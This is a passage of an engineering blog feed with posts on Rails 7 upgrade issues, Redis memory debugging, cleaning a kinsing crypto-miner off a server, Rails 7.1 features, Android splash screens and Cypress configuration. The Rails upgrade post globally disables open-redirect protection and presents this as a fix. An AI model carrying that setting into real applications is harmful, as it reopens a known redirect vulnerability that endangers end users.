end</code></pre><h3>Missing template error with pdf render</h3><p>After the Rails 7 upgrade, the following test started failing.</p><pre><code class="language-rb">def test_get_task_pdf_download_success
  get api_v1_project_section_tasks_download_path(@project.id, @section, @task, format: :pdf)

  assert_response :ok
  assert response.body.starts_with? &quot;%PDF-1.4&quot;
  assert response.body.ends_with? &quot;%EOF\n&quot;
end</code></pre><p>The actual error was <code>Missing template api/v1/projects/tasks/show.html.erb</code>.</p><p>To fix it, we renamed the file from <code>/tasks/show.html.erb</code> to <code>/tasks/show.pdf.erb</code>.
Similarly, we changed the layout from <code>/layouts/pdf.html.erb</code> to <code>/layouts/pdf.pdf.erb</code>.</p><p>Initially, the controller code looked like this.</p><pre><code class="language-rb">format.pdf do
  render \
    template: &quot;api/v1/projects/tasks/show.html.erb&quot;,
    pdf: pdf_file_name,
    layout: &quot;pdf.html.erb&quot;
end</code></pre><p>After the change, the code looked like this.</p><pre><code class="language-rb">format.pdf do
  render \
    template: &quot;api/v1/projects/tasks/show&quot;,
    pdf: pdf_file_name,
    layout: &quot;pdf&quot;
end</code></pre><h3>Open Redirect protection</h3><p>After the Rails 7 upgrade, the following test started failing.</p><pre><code class="language-rb">def test_that_users_are_redirected_to_error_url_when_invalid_subdomain_is_entered
  invalid_subdomain = &quot;invalid-subdomain&quot;
  auth_subdomain_url = URI(app_secrets.auth_app[:url].gsub(app_secrets.app_subdomain, invalid_subdomain))
  auth_app_url = app_secrets.auth_app[:url]

  host! test_domain(invalid_subdomain)
  get &quot;/&quot;

  assert_redirected_to auth_app_url
end</code></pre><p>In the test, we expect the application to redirect to <code>auth_app_url</code>, but instead we get an <code>UnsafeRedirectError</code> for the open redirection.
In Rails 7, the new framework defaults <a href="https://api.rubyonrails.org/v7.0.3.1/classes/ActionController/Redirecting.html#method-i-redirect_to-label-Open+Redirect+protection">protect</a> applications against the <a href="https://cwe.mitre.org/data/definitions/601.html">Open Redirect vulnerability</a>.</p><p>To allow an external redirect, we can pass <code>allow_other_host: true</code>.</p><pre><code class="language-rb">redirect_to &lt;External URL&gt;, allow_other_host: true</code></pre><p>Since we use open redirection in many places, we disabled this protection globally.</p><pre><code class="language-rb">config.action_controller.raise_on_open_redirects = false</code></pre><h3>Argument Error for Mailgun signing key</h3><p>After the upgrade, we started getting the following error in production.</p><pre><code>&gt;&gt; ArgumentError: Missing required Mailgun Signing key. Set action_mailbox.mailgun_signing_key
in your application's encrypted credentials or provide the MAILGUN_INGRESS_SIGNING_KEY
environment variable.</code></pre><p>Before Rails 7, we used the <code>MAILGUN_INGRESS_API_KEY</code> environment variable to set up the <a href="https://guides.rubyonrails.org/action_mailbox_basics.html#mailgun">Mailgun signing key</a>. In Rails 7, that changed to <code>MAILGUN_INGRESS_SIGNING_KEY</code>, so we renamed the environment variable to fix the problem.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Three case studies of debugging Redis running out of memory]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/debugging-redis-memory-issue"/>
      <updated>2022-09-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/debugging-redis-memory-issue</id>
      <content type="html"><![CDATA[<p>In this blog, we will discuss three separate case studies of Redis running out of memory. All three case studies have videos demonstrating how the debugging was done.</p><p>All three videos were prepared for my team members to show how to go about debugging. The videos are being presented &quot;as they were recorded&quot;.</p><h2>First Case Study</h2><p>When a job fails in <a href="https://sidekiq.org/">Sidekiq</a>, Sidekiq puts that job in the <a href="https://github.com/mperham/sidekiq/wiki/API#retries">RetrySet</a> and retries that job until the job succeeds or reaches the maximum number of retries. By default, the maximum number of retries is 25. If a job fails 25 times, then that job is moved to the <a href="https://github.com/mperham/sidekiq/wiki/API#dead">DeadSet</a>. By default, Sidekiq will store up to 10,000 jobs in the DeadSet.</p><p>We had a situation where Redis was running out of memory. Here is how the debugging was done.</p><iframe width="560" height="315" src="https://www.youtube.com/embed/dg-K_IoT-x0" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe><h3>How to inspect the DeadSet</h3><pre><code class="language-ruby">ds = Sidekiq::DeadSet.new
ds.each do |job|
  puts &quot;Job #{job['jid']}: #{job['class']} failed at #{job['failed_at']}&quot;
end</code></pre><p>Run the following to view the latest entry in the DeadSet and the total count:</p><pre><code class="language-ruby">ds.first
ds.count</code></pre><p>To see the memory usage, the following commands were executed in the Redis console.</p><pre><code>&gt; memory usage dead
30042467
&gt; type dead
zset</code></pre><p>As discussed in the video, a very large payload was being sent with each job. This is not the right way to send data to the worker.
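</p><p>The better pattern is to enqueue only a record id and let the worker fetch what it needs. Here is a minimal, self-contained sketch (the worker and record names are hypothetical, and a plain hash stands in for the database so the snippet runs on its own):</p><pre><code class="language-ruby"># Stand-in for a database table. In a real app this would be an Active Record
# model, and the worker would be a Sidekiq worker whose perform_async(id)
# pushes just the integer id to Redis.
RECORDS = {
  42 => { name: "BigBinary", plan: "enterprise" },
}

class SyncWorker
  def perform(record_id)
    # The worker fetches the data itself instead of receiving it in the payload.
    record = RECORDS.fetch(record_id)
    "synced #{record[:name]}"
  end
end

SyncWorker.new.perform(42)</code></pre><p>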
Ideally, some sort of <code>id</code> should be sent to the worker, and the worker should fetch the necessary data from the database based on the received <code>id</code>.</p><h4>References</h4><ol><li><a href="https://github.com/mperham/sidekiq/discussions/5011">How to increase the number of jobs in the Sidekiq deadset or disable deadset</a></li><li><a href="https://github.com/mperham/sidekiq/blob/main/lib/sidekiq/job_retry.rb#L71">Maximum number of job retries in Sidekiq</a></li><li><a href="https://github.com/mperham/sidekiq/blob/a89d84509c569a78882e24e0e28913a22c9311f5/lib/sidekiq.rb#L38">Maximum number of jobs in Sidekiq DeadSet</a></li></ol><h2>Second Case Study</h2><p>In this case, the Redis instance of <a href="https://www.neeto.com/neetochat/">neetochat</a> was running out of memory. The Redis instance had a 50MB capacity, but we were getting the following error.</p><pre><code>ERROR: heartbeat: OOM command not allowed when used memory &gt; 'maxmemory'.</code></pre><p>We were pushing too many geo info records to Redis, and that caused the memory to fill up.
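</p><p>One common guard against this kind of unbounded growth (a hedged sketch using the redis-rb gem, not the exact change we shipped) is to write such cache entries with an expiry, so Redis evicts them on its own instead of accumulating them forever:</p><pre><code class="language-ruby">require "redis"

redis = Redis.new

# Cache a geocoder lookup for 24 hours instead of keeping it forever.
key = "geocoder:http://ipinfo.io/41.174.30.55/geo?"
redis.setex(key, 24 * 60 * 60, '{"cached": "geo data"}')

redis.ttl(key) # seconds left before Redis expires the key</code></pre><p>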
Here is the video capturing the debugging session.</p><iframe width="560" height="315" src="https://www.youtube.com/embed/oz7Pcbc_zxM" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe><p>The following are the commands executed while debugging.</p><pre><code>&gt; ping
PONG
&gt; info
&gt; info memory
&gt; info keyspace
&gt; keys *failed*
&gt; keys *process*
&gt; keys *geocoder*
&gt; get geocoder:http://ipinfo.io/41.174.30.55/geo?</code></pre><h2>Third Case Study</h2><p>In this case, the authentication service of <a href="https://www.neeto.com/">Neeto</a> was failing because of memory exhaustion.</p><p>Here the number of keys was limited, but the payload data was huge, and all that payload data was hogging the memory. Here is the video capturing the debugging session.</p><iframe width="560" height="315" src="https://www.youtube.com/embed/a_Ygbcreokw" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe><p>The following are the commands executed while debugging.</p><pre><code>&gt; ping
&gt; info keyspace
db0:keys=106,expires=86,avg_ttl=1233332728573
&gt; keys * (to see all the keys)</code></pre><p>The last command listed all 106 keys. Next, we needed to find how much memory each of these keys was using. For that, the following commands were executed.</p><pre><code>&gt; memory usage organizations/subdomains/bigbinary/neeto_app_links
736 bytes
&gt; memory usage failed
10316224 (10MB)
&gt; memory usage dead
29871174 (29MB)</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[How my server got infected with a crypto mining malware and how I fixed it]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/how-my-server-got-infected-with-a-crypto-mining-malware-and-how-I-fixed-it"/>
      <updated>2022-09-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-my-server-got-infected-with-a-crypto-mining-malware-and-how-I-fixed-it</id>
      <content type="html"><![CDATA[<p>I was working on a side project recently, where I faced an issue when running a PostgreSQL database. The database server was getting shut down randomly for no apparent reason. I had deployed my Rails application along with its dependencies, like Redis and PostgreSQL, on one of my EC2 instances in AWS.</p><p>PostgreSQL was running on the machine at the default port of <code>5432</code>. Ports <code>443</code> and <code>80</code> were open to everyone, for handling HTTP/S traffic. Port <code>22</code> was also open to everyone, so that anyone with their public SSH keys added to the <code>authorized_keys</code> file on the remote server, or with access to the private key file of the server, could log into the machine remotely.</p><p>For development, I needed to access this remote database locally, so I edited the <code>pg_hba.conf</code> file and opened PostgreSQL to the network. I added a new rule to open port <code>5432</code> so that anyone could connect to the PostgreSQL instance remotely if they had all the credentials. If you look at the screenshot, you will see all the ports that are open to the public network. This was all working great for me, until one fine day it wasn't.</p><p><img src="/blog_images/2022/how-my-server-got-infected-with-a-crypto-mining-malware-and-how-I-fixed-it/aws-before.png" alt="The networking screen in AWS where you can add inbound port rules."></p><p>I realized that something was wrong when I couldn't connect to the PostgreSQL instance remotely one day. The response I was getting was the standard <code>is PostgreSQL running?</code> error.</p><pre><code class="language-bash">psql: could not connect to server: No such file or directory
Connection refused
Is the server running on host ${hostname} and accepting TCP/IP connections on port 5432?</code></pre><p>I was still able to SSH into the VM, so I tried to restart PostgreSQL.
After some investigation, I figured out that PostgreSQL was back up momentarily when I ran <code>systemctl restart postgresql</code>, but it went down again shortly after.</p><p>Inspecting the processes with <code>htop</code>, I was able to see that all the CPU cores were at 100% usage. Something didn't feel right. Sorting the processes based on the percentage of CPU and memory used, I came across two peculiar processes - <code>kdevtmpfsi</code> and <code>kinsing</code>. A quick Google search showed that this was a crypto mining malware that spreads by exploiting flaws in resources that are exposed to the public. Killing the process was of no use, since the malware also adds a cron job to replicate itself so that it can't be stopped.</p><h3>Removing the malware</h3><p>I found all files on the system with <code>kdevtmpfsi</code> and <code>kinsing</code> in their names using the Unix <code>find</code> command and deleted them. The malware's files were inside the <code>/tmp</code> directory.</p><pre><code class="language-bash">find / -name &quot;kdevtmpfsi*&quot;
find / -name &quot;kinsing*&quot;</code></pre><p>Then I checked if there were any cron jobs running on the machine with the <code>crontab</code> command. There were some jobs whose purpose was to reload the malware script even if you delete it. I deleted the jobs related to <code>kdevtmpfsi</code> and <code>kinsing</code>. I also learnt that in Unix, each user has their own crontab, which can run jobs as that particular user.</p><pre><code class="language-bash">crontab -l  # To list the current user's cron jobs
crontab -e  # To edit the crontab and delete the malicious jobs</code></pre><h3>Things to pay attention to</h3><p>I made all the passwords stronger, especially for the resources that were being exposed to the public. One of the lessons I learnt was that you can always be more secure, and that you should never compromise on your passwords.
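</p><p>For example, Ruby's <code>SecureRandom</code> from the standard library can generate a password that is practically impossible to guess (shown purely as an illustration; any reputable password generator works just as well):</p><pre><code class="language-ruby">require "securerandom"

# 24 random bytes, base64-encoded into a 32-character password:
# far stronger than a dictionary word plus a digit and a symbol.
password = SecureRandom.base64(24)
password.length</code></pre><p>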
The passwords that I had set for my users were weak, with just a dictionary word, a digit and a special character - something in the format of <code>himalaya7!</code>.</p><p>Instead of opening the required ports to the public network, I exposed them only to the IP addresses from which I needed access.</p><p>Notice how the ports for SSH and PostgreSQL are only exposed to the required IP addresses now.</p><p><img src="/blog_images/2022/how-my-server-got-infected-with-a-crypto-mining-malware-and-how-I-fixed-it/aws-after.png" alt="how ports 22 and 5432 are only open to certain IP addresses now"></p><p>I moved the application database to a managed PostgreSQL service rather than running it in a VM myself. This also means that I need not worry about performance or uptime, as all of this is taken care of by AWS itself.</p><p>For extra security, I also set up a reverse proxy so that no one can ping my deployed URL and get the IP address of the VM where the application is running.</p><p>Securing your deployments is as important as any other step in deploying your application, and it needs to be a priority right from when you are designing the architecture of your application. Taking care of such small details during development will help you write good code and follow the right patterns from the start.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 allows infinite ranges for LengthValidators and Clusivity validators]]></title>
       <author><name>Ghouse Mohamed</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-endless-ranges-for-activemodel-validations"/>
      <updated>2022-08-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-endless-ranges-for-activemodel-validations</id>
      <content type="html"><![CDATA[<p>Rails 7.1 adds support for infinite ranges in Active Model validations that use the <code>:in</code> and <code>:within</code> options. It was already possible to query using infinite ranges in Active Record like so:</p><pre><code class="language-ruby">Book.where(purchases: 20..)
# Returns a collection of records with purchases of 20 and upwards.

Book.where(purchases: ..20)
# Returns a collection of records with purchases of 20 and below.</code></pre><p>But using infinite ranges in Active Model validations was limited in scope. Rails 7.1 extends this by adding support for infinite ranges in Active Model validations. For example, validating the length of <code>first_name</code> without an upper bound for a <code>User</code> is as simple as writing:</p><pre><code class="language-ruby">class User
  # ...
  validates_length_of :first_name, in: 20..
end</code></pre><p>The length of <code>:first_name</code> does not have an upper bound. As long as the length is greater than or equal to 20, the record will remain valid.</p><p>The above example holds true when using the <code>:within</code> option as well:</p><pre><code class="language-ruby">class User
  # ...
  validates_length_of :first_name, within: 20..
end</code></pre><p>In a similar example, let's look at how we would use Active Model validations along with the <code>:inclusion</code> option:</p><pre><code class="language-ruby">class User
  # ...
  validates :age, inclusion: { in: proc { (25..) } }
end</code></pre><p>The above example validates the <code>:age</code> field such that its value needs to be 25 or above for the record to be valid.</p><p>Please check out the following pull requests for more details:</p><ol><li><a href="https://github.com/rails/rails/pull/45138">Infinite ranges for LengthValidator</a></li><li><a href="https://github.com/rails/rails/pull/45123">Infinite ranges for Clusivity validator</a></li></ol>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 raises RuntimeError if Active Storage service is not specified]]></title>
       <author><name>Ghouse Mohamed</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-raises-error-if-active-storage-service-not-specified"/>
      <updated>2022-08-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-raises-error-if-active-storage-service-not-specified</id>
      <content type="html"><![CDATA[<p>If Active Storage has been configured, but the service type has not been explicitly set in the respective environment's configuration file, then trying to use Active Storage throws the following error message:</p><pre><code class="language-plaintext">Failed to replace attachments_attachments because one or more of the new records could not be saved.</code></pre><p>This is not helpful, and it doesn't indicate where to make the required changes for Active Storage to be able to save the attachment(s). It also allows the application to start as if a valid service had been set for Active Storage to use. Starting with Rails 7.1, if <code>config.active_storage.service</code> has not been explicitly set, then even attempting to start the application will throw a <code>RuntimeError</code> with the following error message:</p><pre><code class="language-plaintext">Missing Active Storage service name. Specify Active Storage service name for config.active_storage.service in config/environments/production.rb</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/44372">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds callbacks for Action Cable commands at the connection level]]></title>
       <author><name>Ghouse Mohamed</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-callbacks-for-action-cable-connection"/>
      <updated>2022-08-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-callbacks-for-action-cable-connection</id>
      <content type="html"><![CDATA[<p>Action Cable allows us to add callbacks for individual channels. These are: <code>after_subscribe</code>, <code>after_unsubscribe</code>, <code>before_subscribe</code>, <code>before_unsubscribe</code>, <code>on_subscribe</code> and <code>on_unsubscribe</code>. These callbacks are registered individually for each channel. Before Rails 7.1, there was no way to register callbacks to be called generically before every command. Rails 7.1 solves this problem by providing a set of callbacks that can be registered at the connection level. These callbacks are called for every command, regardless of which channel's command is being invoked.</p><p>The following callbacks can be registered:</p><ol><li><code>before_command</code>: This callback is invoked before any command is processed by the channel.</li><li><code>around_command</code>: This callback is invoked around the command. Any piece of code before <code>yield</code> is run before the actual command, and any piece of code after <code>yield</code> is run after the command has been processed by the channel.</li><li><code>after_command</code>: This callback is invoked after the command has been processed by the channel.</li></ol><p>Let's take a look at some example code to understand this behaviour better:</p><pre><code class="language-ruby">class Connection &lt; ActionCable::Connection::Base
  identified_by :current_user

  before_command :set_current_user
  around_command :register_telemetry_data
  after_command :update_current_user

  private

    def set_current_user
      if request.params[&quot;user_id&quot;].present?
        self.current_user = User.find_by(id: request.params[&quot;user_id&quot;])
      end
      reject_unauthorized_connection if self.current_user.nil?
    end

    def register_telemetry_data
      self.current_user.register_telemetry({ start: true })
      yield
      self.current_user.register_telemetry({ end: true })
    end

    def update_current_user
      self.current_user.touch(:updated_at)
    end
end</code></pre><p>Here, we can expect <code>set_current_user</code> to be invoked before every command is processed. Similarly, we can expect <code>update_current_user</code> to be invoked after every command is processed. Whereas for <code>register_telemetry_data</code>, <code>self.current_user.register_telemetry({ start: true })</code> is run before the command is processed, and <code>self.current_user.register_telemetry({ end: true })</code> is run after the command is processed.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/44696">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to remove the white screen just before the splash screen in Android]]></title>
       <author><name>Kamolesh Mondal</name></author>
      <link href="https://www.bigbinary.com/blog/adding-splash-screen-in-react-native-cli-app"/>
      <updated>2022-07-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/adding-splash-screen-in-react-native-cli-app</id>
      <content type="html"><![CDATA[<p>In order to add a splash screen, we'll use the <a href="https://www.npmjs.com/package/react-native-splash-screen">react-native-splash-screen</a> package. While most of the job is done by following the installation steps, there are some additional steps we need to follow for Android.</p><p>There's a concept known as the &quot;preview window&quot; in Android, which serves the basic purpose of faking a fast launch of an app when the app icon is clicked. While the preview window fakes a fast launch, it shows an empty white screen until the app has loaded. More info is available in <a href="https://www.tothenew.com/blog/disabling-the-preview-or-start-window-in-android/">this</a> article.</p><p>The preview window itself can be disabled by adding the following line in the <code>android/app/src/main/res/values/styles.xml</code> file.</p><pre><code class="language-xml">&lt;item name=&quot;android:windowDisablePreview&quot;&gt;true&lt;/item&gt;</code></pre><p>However, disabling the preview window introduces an undesirable delay between clicking on the app icon and the actual launch of the app.</p><p>We can get rid of both the delay and the empty white screen by adding an additional splash activity.</p><h2>Additional steps for Android</h2><ul><li><p>Create a <code>background_splash.xml</code> file with the same design you used in <code>launch_screen.xml</code> during the installation above.</p></li><li><p>Place this new xml file inside the <code>android/app/src/main/res/drawable</code> directory.</p></li><li><p>Create a new splash theme in the <code>android/app/src/main/res/values/styles.xml</code> file by adding the following snippet.</p><pre><code class="language-xml">&lt;style name=&quot;SplashTheme&quot; parent=&quot;Theme.AppCompat.Light.NoActionBar&quot;&gt;
    &lt;item name=&quot;android:windowBackground&quot;&gt;@drawable/background_splash&lt;/item&gt;
&lt;/style&gt;</code></pre></li><li><p>Create a new splash activity that calls the main activity, and add the following code in it.</p><pre><code class="language-java">package com.example;

import android.content.Intent;
import android.os.Bundle;

import androidx.appcompat.app.AppCompatActivity;

public class SplashActivity extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent intent = new Intent(this, MainActivity.class);
        startActivity(intent);
        finish();
    }
}</code></pre></li><li><p>Finally, we will call this activity first on launch, with the splash theme we created above.</p></li><li><p>Add the new activity in AndroidManifest.xml.</p><pre><code class="language-xml">&lt;activity
  android:name=&quot;.SplashActivity&quot;
  android:label=&quot;@string/app_name&quot;
  android:launchMode=&quot;singleTask&quot;
  android:theme=&quot;@style/SplashTheme&quot;&gt;
  &lt;intent-filter&gt;
    &lt;action android:name=&quot;android.intent.action.MAIN&quot; /&gt;
    &lt;category android:name=&quot;android.intent.category.LAUNCHER&quot; /&gt;
  &lt;/intent-filter&gt;
&lt;/activity&gt;</code></pre></li><li><p>The intent-filter tag, with its &quot;MAIN&quot; action and &quot;LAUNCHER&quot; category children, allows us to call this new activity first on launch. It's usually found in the main activity by default, so we have to remove it entirely from there, leaving it exclusively in <code>SplashActivity</code>.</p></li></ul><p>Once we've done all this, we can rebuild the app and run it with <code>npx react-native run-android</code> to see the splash screen we created.</p><p>The app should now launch quickly, with no empty white screen on startup.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 allows audio_tag and video_tag to receive Active Storage attachments]]></title>
       <author><name>Ghouse Mohamed</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-extends-support-for-audio-tag-and-video-tag"/>
      <updated>2022-07-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-extends-support-for-audio-tag-and-video-tag</id>
      <content type="html"><![CDATA[<p>Rails 7.1 allows the <code>audio_tag</code> and <code>video_tag</code> Action View helpers to receive Active Storage attachments, implicitly unpacking the asset path to be included in the <code>src</code> attribute of the <code>&lt;audio&gt;&lt;/audio&gt;</code> and <code>&lt;video&gt;&lt;/video&gt;</code> tags.</p><p>Previously, the helper methods accepted only the asset path/url. To get the asset path of an Active Storage attachment, we had to explicitly call <code>polymorphic_path</code> on the attachment, which returned the desired asset path.</p><h3>Before</h3><pre><code class="language-ruby">audio_tag(polymorphic_path(user.audio_file))
# =&gt; &lt;audio src=&quot;/...&quot;&gt;&lt;/audio&gt;

video_tag(polymorphic_path(user.video_file))
# =&gt; &lt;video src=&quot;/...&quot;&gt;&lt;/video&gt;</code></pre><h3>After</h3><pre><code class="language-ruby">audio_tag(user.audio_file)
# =&gt; &lt;audio src=&quot;/...&quot;&gt;&lt;/audio&gt;

video_tag(user.video_file)
# =&gt; &lt;video src=&quot;/...&quot;&gt;&lt;/video&gt;</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/44085">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 returns the Active Storage attachment(s) after saving the attachment]]></title>
       <author><name>Ghouse Mohamed</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-returns-active-storage-blob-after-save"/>
      <updated>2022-07-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-returns-active-storage-blob-after-save</id>
      <content type="html"><![CDATA[<p>Previously, saving an attachment to a record returned a boolean, indicating whether or not the attachment was saved to the record. This was not very helpful, since we had to dig into the record again to retrieve the attachment. Starting with Rails 7.1, saving an attachment to a record returns the saved attachment. We can now conveniently use blob methods like <code>#download</code>, <code>#url</code>, <code>#variant</code>, etc. on the attachment without having to dig into the record again.</p><h3>Before</h3><pre><code class="language-ruby"># rails console
&gt;&gt; @user = User.create!(name: &quot;Josh&quot;)
&gt;&gt; @user.avatar.attach(params[:avatar])
=&gt; true</code></pre><h3>After</h3><pre><code class="language-ruby"># rails console
&gt;&gt; @user = User.create!(name: &quot;Josh&quot;)
&gt;&gt; @user.avatar.attach(params[:avatar])
=&gt; #&lt;ActiveStorage::Attached::One:0x00007f075e592380 @name=&quot;avatar&quot; @record=#&lt;User:0x00007f075e5924e8 id: &quot;1&quot;, name: &quot;Josh&quot;&gt;</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/44439">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Handling SIGHUP error from Heroku]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/fix-sighup-error-from-heroku"/>
      <updated>2022-04-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/fix-sighup-error-from-heroku</id>
      <content type="html"><![CDATA[<p>A video on handling the SIGHUP error from Heroku. We also get to see how to use the <code>notify_at_exit</code> feature of <a href="https://www.honeybadger.io">Honeybadger</a>. Please note that this was an internal video, which we are publishing as-is.</p><p>&lt;iframe width=&quot;100%&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/f8yXrceAotQ&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen&gt;&lt;/iframe&gt;</p>]]></content>
    </entry><entry>
       <title><![CDATA[Configure cypress to run tests in multiple environments]]></title>
       <author><name>Datt Dongare</name></author>
      <link href="https://www.bigbinary.com/blog/cypress-environment-config"/>
      <updated>2022-03-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/cypress-environment-config</id>
      <content type="html"><![CDATA[<p>When we write tests, we want to run them in the local environment first. There are a few reasons for this. We need to add <code>data-cy</code> attributes, verify them, and run the tests. Also, we need to make sure that tests are running fine in the local/development environment before running them in the test/staging environment. Another case might be the one where we need to set up the CI pipeline to execute in different environments.</p><p>In such scenarios, the <code>baseUrl</code> will be different in each environment. But Cypress allows us to configure <code>baseUrl</code> only once in <code>cypress.json</code>. Then how do we configure a <code>baseUrl</code> specific to each of the environments? In this blog, we will see how to configure Cypress step by step so that we can run Cypress tests in multiple environments.</p><h2>1. Add environment-specific configuration</h2><p>To configure Cypress for different environments, we can follow two simple steps.</p><ol><li>Create a <code>config</code> folder in cypress.</li><li>Create separate files for each of the environments.</li></ol><pre><code class="language-javascript">// cypress/config/cypress.development.json
{
  &quot;baseUrl&quot;: &quot;https://localhost:9006&quot;,
  &quot;env&quot;: {
    &quot;environment&quot;: &quot;development&quot;
  },
  &quot;execTimeout&quot;: 18000,
  &quot;defaultCommandTimeout&quot;: 300000,
  &quot;requestTimeout&quot;: 10000,
  &quot;pageLoadTimeout&quot;: 30000,
  &quot;responseTimeout&quot;: 10000,
  &quot;viewportWidth&quot;: 1200,
  &quot;viewportHeight&quot;: 1200,
  &quot;videoUploadOnPasses&quot;: false,
  &quot;retries&quot;: {
    &quot;runMode&quot;: 1,
    &quot;openMode&quot;: 2
  }
}</code></pre><pre><code class="language-javascript">// cypress/config/cypress.test.json
{
  &quot;baseUrl&quot;: &quot;https://test.example.com&quot;,
  &quot;env&quot;: {
    &quot;environment&quot;: &quot;test&quot;
  },
  &quot;execTimeout&quot;: 300000,
  &quot;defaultCommandTimeout&quot;: 60000,
  &quot;requestTimeout&quot;: 20000,
  &quot;pageLoadTimeout&quot;: 60000,
  &quot;responseTimeout&quot;: 20000,
  &quot;viewportWidth&quot;: 1200,
  &quot;viewportHeight&quot;: 1200,
  &quot;videoUploadOnPasses&quot;: true,
  &quot;retries&quot;: {
    &quot;runMode&quot;: 2,
    &quot;openMode&quot;: 1
  }
}</code></pre><pre><code class="language-javascript">// cypress/config/cypress.production.json
{
  &quot;baseUrl&quot;: &quot;https://live.example.com&quot;,
  &quot;env&quot;: {
    &quot;environment&quot;: &quot;production&quot;
  },
  &quot;execTimeout&quot;: 300000,
  &quot;defaultCommandTimeout&quot;: 60000,
  &quot;requestTimeout&quot;: 20000,
  &quot;pageLoadTimeout&quot;: 60000,
  &quot;responseTimeout&quot;: 20000,
  &quot;viewportWidth&quot;: 1200,
  &quot;viewportHeight&quot;: 1200,
  &quot;videoUploadOnPasses&quot;: true,
  &quot;retries&quot;: {
    &quot;runMode&quot;: 2,
    &quot;openMode&quot;: 1
  }
}</code></pre><h2>2. Initialize config files</h2><p>After adding the config folder, we need to tell Cypress about those config files. We can do that by updating <code>plugins/index.js</code> with the following code. This file gets executed after we start the Cypress server.</p><pre><code class="language-javascript">// cypress/plugins/index.js
const fs = require(&quot;fs-extra&quot;);
const path = require(&quot;path&quot;);

const fetchConfigurationByFile = file =&gt; {
  const pathOfConfigurationFile = `config/cypress.${file}.json`;

  return (
    file &amp;&amp; fs.readJson(path.join(__dirname, &quot;../&quot;, pathOfConfigurationFile))
  );
};

module.exports = (on, config) =&gt; {
  const environment = config.env.configFile || &quot;development&quot;;
  const configurationForEnvironment = fetchConfigurationByFile(environment);

  return configurationForEnvironment || config;
};</code></pre><p>In the above code, <code>Cypress</code> loads the configuration file based on the environment. When we run <code>Cypress</code>, we can pass environment variables. In this case, we need to pass <code>configFile</code> as an environment variable. If we don't pass <code>configFile</code>, <code>Cypress</code> will consider <code>development</code> the current environment by default.</p><h2>3. Set up scripts</h2><p>Cypress can accept command-line arguments. We can set the environment by passing these arguments in the <code>cypress run</code> or <code>cypress open</code> command, e.g. <code>cypress open --env configFile=test</code>. This command looks lengthy. Also, sometimes we need to pass more command-line arguments along with <code>configFile</code>. We can create short and handy commands by configuring the <code>package.json</code>.</p><p>For example: <code>yarn run cy:open:dev</code>.</p><pre><code class="language-javascript">// cypress/package.json
&quot;cy:open:dev&quot;: &quot;cypress open --env configFile=development&quot;,
&quot;cy:open:dev:chrome&quot;: &quot;cypress open --browser chrome --env configFile=development&quot;,
&quot;cy:run:dev&quot;: &quot;cypress run --env configFile=development&quot;,
&quot;cy:open:staging&quot;: &quot;cypress open --env configFile=test&quot;,
&quot;cy:run:staging&quot;: &quot;cypress run --env configFile=test&quot;,</code></pre><h2>4. Precedence of configuration</h2><p>By default, we have <code>cypress.json</code> in Cypress, where some config can be added. The files in the <code>config</code> folder take precedence over <code>cypress.json</code>. So if we have a key like <code>execTimeout</code> defined in both <code>cypress.json</code> and <code>cypress.test.json</code>, the value of <code>execTimeout</code> in <code>cypress.test.json</code> will be used.</p><p>Generally, the rule of thumb is that configuration common to all the environments can be kept in <code>cypress.json</code>, while environment-specific config can be kept in the <code>config/</code> folder.</p><h2>Conclusion</h2><p>We saw how we can configure Cypress for multiple environments. This way, we can run Cypress in each environment without much hassle. This definitely helps us in running Cypress locally as well as in the production environment.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds only_numeric option to numericality validator]]></title>
       <author><name>Aditya Bhutani</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-only_numeric-option-to-numericality-validator"/>
